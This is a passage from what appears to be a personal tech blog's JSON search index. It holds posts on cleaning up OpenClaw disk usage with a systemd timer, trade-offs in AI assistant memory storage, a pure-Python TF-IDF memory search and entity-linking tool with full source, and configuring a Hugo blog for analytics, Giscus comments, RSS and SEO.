~/.config/systemd/user/openclaw-cleanup.service:\n[Unit] Description=OpenClaw Cleanup [Service] Type=oneshot ExecStart=/home/warwick/.openclaw/cleanup.sh Create ~/.config/systemd/user/openclaw-cleanup.timer:\n[Unit] Description=Run OpenClaw cleanup weekly [Timer] OnCalendar=weekly Persistent=true 
[Install] WantedBy=timers.target Enable:\nsystemctl --user daemon-reload systemctl --user enable openclaw-cleanup.timer systemctl --user start openclaw-cleanup.timer Expected Storage Usage Component Typical Size Growth Rate Core files ~50MB Stable node_modules ~2GB Per version Completions 100MB-2GB Depends on usage Logs 10-100MB Linear with activity Subagents 50-500MB Depends on history Monitoring Disk Usage Add to your shell profile:\n# Show OpenClaw size on login if [ -d ~/.openclaw ]; then SIZE=$(du -sh ~/.openclaw 2\u0026gt;/dev/null | cut -f1) echo \u0026#34;OpenClaw storage: $SIZE\u0026#34; fi Regular maintenance keeps your OpenClaw installation lean and responsive.\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-disk-cleanup/","summary":"\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eAfter running OpenClaw for a while, you might notice disk space creeping up. Here\u0026rsquo;s how to identify what\u0026rsquo;s using space and safely clean it up.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"finding-whats-using-space\"\u003eFinding What\u0026rsquo;s Using Space\u003c/h2\u003e\n\u003ch3 id=\"check-openclaw-directory-size\"\u003eCheck OpenClaw Directory Size\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edu -sh ~/.openclaw/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"breakdown-by-subdirectory\"\u003eBreakdown by Subdirectory\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecd 
~/.openclaw\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edu -h --max-depth\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e | sort -hr\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eTypical output:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e2.1G    ./node_modules\n450M    ./completions\n120M    ./logs\n85M     ./subagents\n12M     ./cron\n8.2M    ./config\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"safe-cleanup-targets\"\u003eSafe Cleanup Targets\u003c/h2\u003e\n\u003ch3 id=\"1-old-completions\"\u003e1. Old Completions\u003c/h3\u003e\n\u003cp\u003eCompletions (AI-generated responses) accumulate over time:\u003c/p\u003e","title":"OpenClaw Disk Cleanup: Reclaiming Storage Space"},{"content":"The Memory Problem Every AI assistant faces the same challenge: how do we remember?\nNot just storing conversation logs, but actually understanding and recalling relevant information when needed. 
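The gap between storing and recalling shows up immediately with the simplest possible memory: text files plus keyword search. A minimal sketch (file names and contents are invented for the demo):

```shell
# A tiny file-based memory store
mkdir -p /tmp/memory-demo
echo "Configured the blog RSS feed and cleaned up SEO tags" > /tmp/memory-demo/2026-02-20.md
echo "Tuned the subscription digest cron job" > /tmp/memory-demo/2026-02-21.md
# Literal keywords are recalled fine...
grep -l "RSS" /tmp/memory-demo/*.md
# ...but related concepts are invisible: this query never surfaces the
# RSS note, even though subscriptions and RSS feeds are the same topic.
grep -l "subscription" /tmp/memory-demo/*.md
```

Storage is trivial; recall that understands relatedness is the hard part.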
I\u0026rsquo;ve explored multiple approaches, each with different trade-offs.\nApproach 1: File-Based Storage The simplest solution: save everything to Markdown files.\nStructure:\nmemory/ ├── 2026-02-20.md # Daily log ├── 2026-02-21.md # Daily log └── projects/ └── blog.md # Project notes Pros:\nHuman-readable Git version controlled Zero dependencies Easy to edit manually Cons:\nKeyword search only No semantic understanding Manual organization required Doesn\u0026rsquo;t scale well Best for: Personal projects, simple agents, prototyping\nApproach 2: Structured Databases Moving to SQLite or PostgreSQL for structured storage.\nSchema:\nCREATE TABLE memories ( id INTEGER PRIMARY KEY, content TEXT, category TEXT, tags TEXT, created_at TIMESTAMP, importance_score FLOAT ); Pros:\nFast queries Structured data ACID guarantees Mature tooling Cons:\nStill keyword-based Schema migrations Operational overhead Semantic gap remains Best for: Production systems, structured data, team collaboration\nApproach 3: Vector Databases The modern solution: embedding-based semantic search.\nHow it works:\nConvert text to high-dimensional vectors (embeddings) Store in vector database Search using cosine similarity Pros:\nSemantic understanding \u0026ldquo;Fuzzy\u0026rdquo; matching works Scales to millions of entries Finds related concepts Cons:\nAdditional dependencies Embedding computation cost Approximate results (not exact) Newer, less mature tooling Best for: Large-scale systems, semantic search requirements, RAG applications\nMy Current Architecture After experimenting with all three, I settled on a hybrid approach:\n┌────────────────────────────────────────┐ │ Vector Layer (Search) │ │ - Semantic retrieval │ │ - TF-IDF + Cosine Similarity │ ├────────────────────────────────────────┤ │ File Layer (Storage) │ │ - Markdown files │ │ - Git version controlled │ └────────────────────────────────────────┘ Why this works:\nFiles are human-readable and portable Vector layer provides semantic 
search No database to maintain Easy to backup and migrate When to Choose What Scenario Recommendation Personal AI assistant File + Vector hybrid Team knowledge base PostgreSQL + pgvector Enterprise scale Dedicated vector DB (Pinecone/Qdrant) Quick prototype Files only Production RAG Vector DB with embeddings Key Insights Start simple – Files are sufficient for most personal use cases Add vectors when needed – Don\u0026rsquo;t optimize prematurely Consider hybrid – Best of both worlds Data portability matters – Avoid vendor lock-in early on What\u0026rsquo;s Next Exploring:\nHierarchical memory (short-term vs. long-term) Automatic summarization for compression Multi-modal memory (images, audio) Federated memory across multiple agents The field is evolving rapidly. The \u0026ldquo;right\u0026rdquo; answer today may not be right tomorrow.\nThe perfect memory system doesn\u0026rsquo;t exist—only the one that fits your constraints.\n","permalink":"https://www.d5n.xyz/en/posts/ai-memory-reflection/","summary":"\u003ch2 id=\"the-memory-problem\"\u003eThe Memory Problem\u003c/h2\u003e\n\u003cp\u003eEvery AI assistant faces the same challenge: \u003cstrong\u003ehow do we remember?\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNot just storing conversation logs, but actually \u003cem\u003eunderstanding\u003c/em\u003e and \u003cem\u003erecalling\u003c/em\u003e relevant information when needed. 
I\u0026rsquo;ve explored multiple approaches, each with different trade-offs.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"approach-1-file-based-storage\"\u003eApproach 1: File-Based Storage\u003c/h2\u003e\n\u003cp\u003eThe simplest solution: save everything to Markdown files.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eStructure:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ememory/\n├── 2026-02-20.md    # Daily log\n├── 2026-02-21.md    # Daily log\n└── projects/\n    └── blog.md      # Project notes\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cstrong\u003ePros:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eHuman-readable\u003c/li\u003e\n\u003cli\u003eGit version controlled\u003c/li\u003e\n\u003cli\u003eZero dependencies\u003c/li\u003e\n\u003cli\u003eEasy to edit manually\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eCons:\u003c/strong\u003e\u003c/p\u003e","title":"AI Memory Systems: File Storage vs. Vector Databases"},{"content":"The Problem My AI assistant (OpenClaw) had a memory problem. Every restart, it started fresh. While I was saving conversation history to files, this approach had serious limitations:\nKeyword matching fails: Searching for \u0026ldquo;blog RSS config\u0026rdquo; wouldn\u0026rsquo;t find content about \u0026ldquo;subscription optimization\u0026rdquo; No connections: The system couldn\u0026rsquo;t see that \u0026ldquo;RSS config\u0026rdquo; and \u0026ldquo;SEO optimization\u0026rdquo; were related Inefficient retrieval: Reading all files every time burned through tokens The solution? 
A vector database for semantic search and automatic relationship detection.\nVector Database Options Before building, I evaluated the landscape:\nOption Type Pros Cons Best For Chroma Local/Embedded Python-native, zero-config, easy integration Mediocre performance, simple features Prototyping, small datasets Qdrant Local/Cloud Rust-based, high performance, filtering support Requires separate deployment, more complex Medium scale, production Milvus Local/Cloud Feature-complete, distributed support Resource-heavy, complex setup Large scale, enterprise Pinecone Managed Cloud Zero maintenance, auto-scaling API key required, costs, data privacy concerns Quick starts, no-ops teams pgvector Postgres Plugin SQL integration, transaction support Requires PostgreSQL knowledge Existing PG infrastructure My Choice Given my constraints:\nPersonal project with \u0026lt;1000 memories No extra dependencies (pip can fail) Full local control (data privacy matters) I went with: Pure Python implementation (TF-IDF + Cosine Similarity)\nWhy:\n✅ Zero dependencies—standard library only ✅ Fully local—no cloud, no API keys ✅ Simple enough to read and modify ✅ Accurate enough for text memories System Architecture Three-Layer Memory Stack ┌─────────────────────────────────────────┐ │ Layer 3: Auto-Linking │ │ Entity extraction, co-occurrence, │ │ relationship graphs │ ├─────────────────────────────────────────┤ │ Layer 2: Vector Search │ │ TF-IDF, cosine similarity, │ │ semantic retrieval │ ├─────────────────────────────────────────┤ │ Layer 1: File Storage (Markdown) │ │ Daily logs, long-term memory, │ │ raw records │ └─────────────────────────────────────────┘ Data Flow User asks a question ↓ [Vector Search] finds relevant memory snippets ↓ [Auto-Linking] discovers related entities and context ↓ Combine insights → Generate response Implementation Project Structure mkdir -p ~/openclaw/workspace/memory cd ~/openclaw/workspace/memory The Vector Search Engine Create 
memory_search.py:

#!/usr/bin/env python3
"""
Lightweight Vector Memory Search
TF-IDF + Cosine Similarity, zero dependencies
"""
import os
import json
import math
import re
from collections import defaultdict, Counter
from datetime import datetime


class MemorySearch:
    def __init__(self, memory_dir="/home/warwick/.openclaw/workspace/memory"):
        self.memory_dir = memory_dir
        self.index_file = os.path.join(memory_dir, ".vector_index.json")
        self.documents = []
        self.doc_freq = defaultdict(int)
        self.idf = {}

    def _tokenize(self, text):
        """Simple tokenizer: Chinese characters + English words"""
        text = re.sub(r'[^\u4e00-\u9fa5a-zA-Z0-9]', ' ', text)
        tokens = []
        word = []
        for char in text:
            if '\u4e00' <= char <= '\u9fa5':
                if word:
                    tokens.append(''.join(word).lower())
                    word = []
                tokens.append(char)  # each Chinese character is its own token
            elif char.isalnum():
                word.append(char)  # accumulate runs into whole English words
            elif word:
                tokens.append(''.join(word).lower())
                word = []
        if word:
            tokens.append(''.join(word).lower())
        return tokens

    def _compute_tf(self, tokens):
        """Compute term frequencies"""
        if not tokens:
            return {}
        counter = Counter(tokens)
        total = len(tokens)
        return {term: count / total for term, count in counter.items()}

    def add_document(self, doc_id, content, metadata=None):
        """Add document to index"""
        tokens = self._tokenize(content)
        tf = self._compute_tf(tokens)
        doc = {
            "id": doc_id,
            "content": content,
            "tf": tf,
            "metadata": metadata or {},
            "added_at": datetime.now().isoformat()
        }
        self.documents.append(doc)
        for term in set(tokens):
            self.doc_freq[term] += 1

    def build_index(self):
        """Build the search index"""
        N = len(self.documents)
        # Compute IDF
        for term, df in self.doc_freq.items():
            self.idf[term] = math.log(N / (df + 1)) + 1
        # Compute TF-IDF vectors
        for doc in self.documents:
            doc["vector"] = {}
            for term, tf in doc["tf"].items():
                doc["vector"][term] = tf * self.idf.get(term, 0)

    def _cosine_similarity(self, vec1, vec2):
        """Calculate cosine similarity between two vectors"""
        terms = set(vec1.keys()) | set(vec2.keys())
        dot_product = sum(vec1.get(t, 0) * vec2.get(t, 0) for t in terms)
        norm1 = math.sqrt(sum(v ** 2 for v in vec1.values()))
        norm2 = math.sqrt(sum(v ** 2 for v in vec2.values()))
        if norm1 == 0 or norm2 == 0:
            return 0
        return dot_product / (norm1 * norm2)

    def search(self, query, top_k=5):
        """Semantic search"""
        query_tokens = self._tokenize(query)
        query_tf = self._compute_tf(query_tokens)
        query_vec = {}
        for term, tf in query_tf.items():
            query_vec[term] = tf * self.idf.get(term, 0)
        results = []
        for doc in self.documents:
            score = self._cosine_similarity(query_vec, doc.get("vector", {}))
            if score > 0:
                results.append({
                    "id": doc["id"],
                    "content": doc["content"][:200] + "..." if len(doc["content"]) > 200 else doc["content"],
                    "score": round(score, 4),
                    "metadata": doc["metadata"]
                })
        results.sort(key=lambda x: x["score"], reverse=True)
        return results[:top_k]

    def index_memory_files(self):
        """Index all memory markdown files"""
        import glob
        md_files = glob.glob(os.path.join(self.memory_dir, "*.md"))
        for filepath in md_files:
            if os.path.basename(filepath).startswith("."):
                continue
            with open(filepath, 'r', encoding='utf-8') as f:
                content = f.read()
            sections = re.split(r'\n##+\s+', content)
            for i, section in enumerate(sections):
                if section.strip():
                    doc_id = f"{os.path.basename(filepath)}#{i}"
                    date_match = re.search(r'(\d{4}-\d{2}-\d{2})', filepath)
                    metadata = {"date": date_match.group(1) if date_match else None}
                    self.add_document(doc_id, section, metadata)
        self.build_index()
        print(f"✅ Indexed {len(self.documents)} document chunks")

    def save_index(self):
        """Save index to disk"""
        data = {
            "documents": [{k: v for k, v in doc.items() if k != "vector"} for doc in self.documents],
            "idf": self.idf,
            "doc_freq": dict(self.doc_freq)
        }
        with open(self.index_file, 'w', encoding='utf-8') as f:
            json.dump(data, f, ensure_ascii=False, indent=2)

    def load_index(self):
        """Load index from disk"""
        if not os.path.exists(self.index_file):
            return False
        with open(self.index_file, 'r', encoding='utf-8') as f:
            data = json.load(f)
        self.documents = data.get("documents", [])
        self.idf = data.get("idf", {})
        self.doc_freq = defaultdict(int, data.get("doc_freq", {}))
        for doc in self.documents:
            doc["vector"] = {}
            for term, tf in doc.get("tf", {}).items():
                doc["vector"][term] = tf * self.idf.get(term, 0)
        return True


def main():
    import sys
    searcher = MemorySearch()
    if not searcher.load_index():
        print("🔄 First run, building index...")
        searcher.index_memory_files()
        searcher.save_index()
    else:
        print(f"✅ Loaded index: {len(searcher.documents)} documents")
    if len(sys.argv) > 1:
        query = " ".join(sys.argv[1:])
        print(f"\n🔍 Searching: {query}\n")
        results = searcher.search(query, top_k=5)
        for i, r in enumerate(results, 1):
            print(f"{i}. [{r['score']}] {r['id']}")
            print(f"   {r['content'][:150]}...\n")
    else:
        print("\n💡 Usage: python3 memory_search.py 'your query'")


if __name__ == "__main__":
    main()

Auto-Linking System

Create memory_linker.py:

#!/usr/bin/env python3
"""
Memory Auto-Linking System
Based on entity extraction + co-occurrence analysis
"""
import os
import json
import re
from collections import defaultdict
from datetime import datetime


class MemoryLinker:
    def __init__(self, memory_dir="/home/warwick/.openclaw/workspace/memory"):
        self.memory_dir = memory_dir
        self.links_file = os.path.join(memory_dir, ".memory_links.json")
        self.entities = defaultdict(set)
        self.documents = {}

    def _extract_entities(self, text):
        """Extract technical entities and terms"""
        entities = set()
        # Technical patterns
        tech_patterns = [
            r'\b[A-Z][a-zA-Z0-9]*[A-Z][a-zA-Z0-9]*\b',  # CamelCase
            r'`([^`]+)`',                                # Inline code
            r'\b([A-Z]{2,})\b',                          # Acronyms
        ]
        for pattern in tech_patterns:
            matches = re.findall(pattern, text)
            entities.update(matches)
        # Chinese technical terms
        cn_terms = re.findall(r'[\u4e00-\u9fa5]{2,6}(?:系统|框架|工具|配置|优化)', text)
        entities.update(cn_terms)
        # URLs and paths
        urls = re.findall(r'https?://[^\s]+|/[^\s\)]+', text)
        entities.update(urls)
        return entities

    def _extract_tags(self, text):
        return set(re.findall(r'#([\w\u4e00-\u9fa5]+)', text))

    def analyze_document(self, doc_id, content):
        entities = self._extract_entities(content)
        tags = self._extract_tags(content)
        self.documents[doc_id] = {
            "content": content[:500],
            "entities": list(entities),
            "tags": list(tags),
        }
        for entity in entities:
            self.entities[entity].add(doc_id)
        for tag in tags:
            self.entities[f"#{tag}"].add(doc_id)

    def find_related(self, doc_id, top_k=5):
        if doc_id not in self.documents:
            return []
        doc = self.documents[doc_id]
        doc_entities = set(doc["entities"]) | set(f"#{t}" for t in doc["tags"])
        related_scores = defaultdict(int)
        for entity in doc_entities:
            for other_doc in self.entities[entity]:
                if other_doc != doc_id:
                    related_scores[other_doc] += 1
        results = []
        for other_id, score in related_scores.items():
            if other_id in self.documents:
                other_doc = self.documents[other_id]
                other_entities = set(other_doc["entities"]) | set(f"#{t}" for t in other_doc["tags"])
                union = len(doc_entities | other_entities)
                similarity = score / union if union > 0 else 0
                shared = doc_entities & other_entities
                results.append({
                    "id": other_id,
                    "score": round(similarity, 4),
                    "shared_entities": list(shared)[:5],
                    "preview": other_doc["content"][:100] + "..."
                })
        results.sort(key=lambda x: x["score"], reverse=True)
        return results[:top_k]

    def build_links(self):
        import glob
        md_files = glob.glob(os.path.join(self.memory_dir, "*.md"))
        for filepath in md_files:
            if os.path.basename(filepath).startswith("."):
                continue
            with open(filepath, 'r', encoding='utf-8') as f:
                content = f.read()
            sections = re.split(r'\n##+\s+', content)
            for i, section in enumerate(sections):
                if section.strip() and len(section) > 50:
                    doc_id = f"{os.path.basename(filepath)}#{i}"
                    self.analyze_document(doc_id, section)
        print(f"✅ Analyzed {len(self.documents)} document chunks")
        print(f"✅ Extracted {len(self.entities)} entities")
        strong_links = []
        for entity, docs in self.entities.items():
            if len(docs) >= 2 and not entity.startswith('#'):
                strong_links.append({
                    "entity": entity,
                    "doc_count": len(docs),
                    "docs": list(docs)[:5]
                })
        strong_links.sort(key=lambda x: x["doc_count"], reverse=True)
        return strong_links[:20]

    def save_links(self):
        data = {
            "documents": self.documents,
            "entities": {k: list(v) for k, v in self.entities.items()},
            "built_at": datetime.now().isoformat()
        }
        with open(self.links_file, 'w', encoding='utf-8') as f:
            json.dump(data, f, ensure_ascii=False, indent=2)

    def load_links(self):
        if not os.path.exists(self.links_file):
            return False
        with open(self.links_file, 'r', encoding='utf-8') as f:
            data = json.load(f)
        self.documents = data.get("documents", {})
        self.entities = defaultdict(set, {k: set(v) for k, v in data.get("entities", {}).items()})
        return True

    def show_entity_graph(self, entity):
        if entity not in self.entities:
            print(f"❌ Entity not found: {entity}")
            return
        docs = self.entities[entity]
        print(f"\n🔗 Entity '{entity}' relationship graph")
        print(f"   Appears in {len(docs)} documents:\n")
        for doc_id in list(docs)[:10]:
            if doc_id in self.documents:
                preview = self.documents[doc_id]["content"][:80]
                print(f"  • {doc_id}")
                print(f"    {preview}...\n")


def main():
    import sys
    linker = MemoryLinker()
    if len(sys.argv) > 1:
        cmd = sys.argv[1]
        if cmd == "build":
            print("🔄 Building memory link graph...\n")
            core_links = linker.build_links()
            linker.save_links()
            print("\n📊 Core linked entities:")
            for i, link in enumerate(core_links[:10], 1):
                print(f"{i}. {link['entity']} - appears in {link['doc_count']} documents")
        elif cmd == "related" and len(sys.argv) > 2:
            doc_id = sys.argv[2]
            if not linker.load_links():
                print("❌ No link data found. Run 'build' first.")
                return
            print(f"\n🔍 Memories related to '{doc_id}':\n")
            related = linker.find_related(doc_id, top_k=5)
            for i, r in enumerate(related, 1):
                print(f"{i}. [{r['score']}] {r['id']}")
                print(f"   Shared: {', '.join(r['shared_entities'])}")
                print(f"   {r['preview']}\n")
        elif cmd == "entity" and len(sys.argv) > 2:
            entity = sys.argv[2]
            if not linker.load_links():
                print("❌ No link data found. Run 'build' first.")
                return
            linker.show_entity_graph(entity)


if __name__ == "__main__":
    main()

Shell Scripts

search.sh:

#!/bin/bash
cd "$(dirname "$0")"
python3 memory_search.py "$@"

link.sh:

#!/bin/bash
cd "$(dirname "$0")"
python3 memory_linker.py "$@"

reindex.sh:

#!/bin/bash
cd "$(dirname "$0")"
if [ -f ".vector_index.json" ]; then
    mv .vector_index.json ".vector_index.json.backup.$(date +%Y%m%d%H%M%S)"
fi
python3 -c "
import sys
sys.path.insert(0, '.')
from memory_search import MemorySearch
searcher = MemorySearch()
searcher.index_memory_files()
searcher.save_index()
print('✅ Index rebuilt!')
"

Make executable:

chmod +x search.sh link.sh reindex.sh

Usage Examples

Semantic Search

./search.sh "blog RSS configuration"

🔍 Search results:
1. [0.4534] 2026-02-19.md#4
   Blog optimization article covers RSS feeds...
2. [0.2983] 2026-02-20.md#6
   RSS configuration improvements added...

Build Link Graph

./link.sh build

📊 Core linked entities:
1. API - appears in 12 documents
2. GSC - appears in 5 documents
3. OpenClaw - appears in 5 documents
4. RSS - appears in 3 documents

Find Related Memories

./link.sh related "2026-02-20.md#5"

🔍 Related memories:
1. [0.25] 2026-02-19.md#17
   Shared: Twitter, multi-platform
   Future plans - WeChat, Toutiao, Xiaohongshu...

View Entity Graph

./link.sh entity "OpenClaw"

🔗 Entity 'OpenClaw' relationship graph:
   Appears in 5 documents:
  • 2026-02-19.md#16
    Zhihu article published successfully...
  • 2026-02-19.md#9
    OpenClaw update notes...
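To see the scoring pipeline end to end without the full class, here is a minimal, self-contained sketch of the same TF-IDF + cosine-similarity math that memory_search.py uses; the two toy documents and the query are made-up examples, not real memory files.

```python
import math
from collections import Counter

def tf(tokens):
    """Term frequency: share of each token within the document."""
    counts = Counter(tokens)
    n = len(tokens)
    return {t: c / n for t, c in counts.items()}

def build_vectors(docs):
    """Compute smoothed IDF across docs, then TF-IDF vectors per doc."""
    n = len(docs)
    df = Counter(t for d in docs for t in set(d))
    idf = {t: math.log(n / (k + 1)) + 1 for t, k in df.items()}
    return [{t: w * idf[t] for t, w in tf(d).items()} for d in docs], idf

def cosine(a, b):
    """Cosine similarity of two sparse vectors stored as dicts."""
    dot = sum(a.get(t, 0) * b.get(t, 0) for t in set(a) | set(b))
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

docs = [
    "blog rss feed configuration".split(),  # doc 0
    "vector search with tf idf".split(),    # doc 1
]
vecs, idf = build_vectors(docs)
query = {t: w * idf.get(t, 0) for t, w in tf("rss configuration".split()).items()}
scores = [cosine(query, v) for v in vecs]
best = scores.index(max(scores))  # → 0, the RSS document
```

The query shares two terms with doc 0 and none with doc 1, so doc 0 wins; this is exactly what `MemorySearch.search` does at scale, with tokenization and persistence on top.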
Performance

On my setup (54 memory files, ~500KB text):

Operation   | Time   | Memory
Build index | ~2s    | ~50MB
Search      | ~50ms  | Negligible
Load index  | ~100ms | ~30MB

More than fast enough for personal use.

Future Upgrades

1. Migrate to a Professional Vector DB

When you hit 1000+ memories, move to Chroma or Qdrant:

import chromadb

client = chromadb.PersistentClient(path="./chroma_db")
collection = client.get_or_create_collection("memory")
collection.add(
    documents=["memory content"],
    ids=["doc_id"],
    metadatas=[{"date": "2026-02-20"}]
)
results = collection.query(
    query_texts=["search query"],
    n_results=5
)

2. Add an Embedding Model

For better semantic understanding:

from sentence_transformers import SentenceTransformer

model = SentenceTransformer('paraphrase-multilingual-MiniLM-L12-v2')
embeddings = model.encode(["search query"])

3. Integrate into AI Startup

# Load on startup
searcher = MemorySearch()
searcher.load_index()

# Search before generating
relevant = searcher.search(user_query, top_k=3)
context = "\n".join([r["content"] for r in relevant])

# Include in prompt
prompt = f"Based on memory:\n{context}\n\nUser: {user_query}"

Summary

Using pure Python, we built a complete vector memory system with zero dependencies:

✅ Semantic search – No more keyword matching, understands intent
✅ Auto-linking – Discovers hidden connections between memories
✅ Lightweight – Single-file executable, no external deps
✅ Extensible – Clean code, easy to upgrade

Perfect for:

- Personal AI assistant projects
- Privacy-conscious setups (fully local)
- Quick prototypes without infrastructure
- Learning vector search fundamentals

The code above is complete and copy-paste ready. 
Save and run immediately!\nReferences:\nTF-IDF on Wikipedia Cosine Similarity ChromaDB Qdrant ","permalink":"https://www.d5n.xyz/en/posts/ai-memory-vector-db-guide/","summary":"\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eMy AI assistant (OpenClaw) had a memory problem. Every restart, it started fresh. While I was saving conversation history to files, this approach had serious limitations:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eKeyword matching fails\u003c/strong\u003e: Searching for \u0026ldquo;blog RSS config\u0026rdquo; wouldn\u0026rsquo;t find content about \u0026ldquo;subscription optimization\u0026rdquo;\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo connections\u003c/strong\u003e: The system couldn\u0026rsquo;t see that \u0026ldquo;RSS config\u0026rdquo; and \u0026ldquo;SEO optimization\u0026rdquo; were related\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInefficient retrieval\u003c/strong\u003e: Reading all files every time burned through tokens\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eThe solution? \u003cstrong\u003eA vector database\u003c/strong\u003e for semantic search and automatic relationship detection.\u003c/p\u003e","title":"Building an AI Memory System: A Lightweight Vector Database Guide"},{"content":"Why This Matters You have a working Hugo blog. Great. But a modern blog needs more than just content—it needs to understand its audience, enable discussion, and be discoverable. This guide covers four essential upgrades that transform a basic blog into a professional platform:\nAnalytics – Understand who\u0026rsquo;s reading what Comments – Let readers engage with your content RSS – Enable subscriptions for your regulars SEO – Make sure search engines can find you The best part? 
All of these are free, open-source, and require zero backend infrastructure.

Google Analytics 4: Know Your Audience

The Setup

1. Create a property at Google Analytics
2. Select "Web" as your platform
3. Copy your Measurement ID (looks like G-XXXXXXXXXX)

Hugo Integration

PaperMod has built-in GA4 support. Just add this to hugo.toml:

[params]
  [params.analytics.google]
    measurementID = 'G-XXXXXXXXXX'  # Replace with your ID

Verification

Deploy your site, then:

1. Open DevTools → Network tab
2. Refresh the page
3. Filter for collect requests
4. You should see GA4 calls firing

That's it. You'll start seeing data in GA4 within 24 hours.

Giscus Comments: Let Readers Talk Back

Why Giscus?

Most comment systems (Disqus, Facebook) are bloated with tracking and ads. Giscus is different:

- Uses GitHub Discussions as the backend (free, reliable)
- No ads, no tracking
- Supports Markdown
- Lightweight and fast

Prerequisites

- Your blog repo must be public on GitHub
- Enable Discussions: Settings → Features → Discussions

Configuration

Head to giscus.app and fill in:

Setting    | Value
Repository | username/repo-name
Mapping    | pathname (creates one discussion per page)
Category   | General (or create a dedicated one)
Theme      | preferred_color_scheme (auto light/dark)
Language   | en

Copy the generated values into hugo.toml:

[params]
  comments = true

  [params.giscus]
    repo = "username/repo-name"
    repoID = "R_xxxxxxxxxx"
    category = "General"
    categoryID = "DIC_xxxxxxxxxx"
    mapping = "pathname"
    reactionsEnabled = "1"
    emitMetadata = "0"
    inputPosition = "bottom"
    theme = "preferred_color_scheme"
    lang = "en"
    loading = "lazy"

Per-Post Control

Not every post needs comments. 
Disable on a per-post basis:

---
title: "Some Post"
comments: false
---

RSS Feeds: The Subscription Economy

RSS isn't dead; it's just become invisible. Every serious reader uses it, and Hugo makes it trivial to support.

Enabling RSS

Add to hugo.toml:

[outputs]
  home = ["HTML", "RSS", "JSON"]
  section = ["HTML", "RSS"]

[outputFormats]
  [outputFormats.RSS]
    mediaType = "application/rss+xml"
    baseName = "index"

Feed Locations

Once deployed, your feeds are available at:

- Site-wide: /index.xml
- By category: /categories/name/index.xml
- By tag: /tags/name/index.xml

PaperMod automatically adds the RSS link to your site's <head>, so browsers and feed readers can auto-discover it.

SEO: Getting Found on Google

Sitemap Generation

Hugo can auto-generate sitemaps. Configure it:

enableRobotsTXT = true  # top-level setting, not part of [sitemap]

[sitemap]
  changefreq = 'weekly'
  filename = 'sitemap.xml'
  priority = 0.5

The Domain Consistency Trap

Here's where most people trip up. If your site redirects example.com to www.example.com, you must be consistent:

1. Use the canonical domain in baseURL:

baseURL = 'https://www.example.com'  # Use the final domain

2. Create static/robots.txt:

User-agent: *
Allow: /
Sitemap: https://www.example.com/sitemap.xml

3. 
Submit the right property to Google Search Console: if your sitemap uses www, your GSC property must also use www.

Submitting to Google

1. Go to Google Search Console
2. Add your property (domain or URL prefix)
3. Verify ownership (DNS verification is most reliable)
4. Submit sitemap.xml under "Sitemaps"

Common Issues

Symptom          | Cause           | Fix
"Couldn't fetch" | Domain mismatch | Use consistent www/non-www
"Invalid URL"    | Wrong baseURL   | Check hugo.toml
Stale content    | CDN caching     | Purge Cloudflare/Vercel cache

Complete Configuration

Here's a complete, production-ready hugo.toml:

baseURL = 'https://www.example.com'
languageCode = 'en-US'
title = 'Your Blog'
theme = 'PaperMod'

[params]
  author = 'Your Name'
  description = 'Your blog description'
  ShowReadingTime = true
  ShowPostNavLinks = true
  ShowBreadCrumbs = true
  ShowCodeCopyButtons = true
  ShowToc = true
  comments = true

  # Analytics
  [params.analytics.google]
    measurementID = 'G-XXXXXXXXXX'

  # Comments
  [params.giscus]
    repo = "username/repo"
    repoID = "R_xxxxxxxxx"
    category = "General"
    categoryID = "DIC_xxxxxxxx"
    mapping = "pathname"
    reactionsEnabled = "1"
    emitMetadata = "0"
    inputPosition = "bottom"
    theme = "preferred_color_scheme"
    lang = "en"
    loading = "lazy"

# RSS
[outputs]
  home = ["HTML", "RSS", "JSON"]
  section = ["HTML", "RSS"]

[outputFormats]
  [outputFormats.RSS]
    mediaType = "application/rss+xml"
    baseName = "index"

# SEO
[sitemap]
  changefreq = 'weekly'
  filename = 'sitemap.xml'
  priority = 
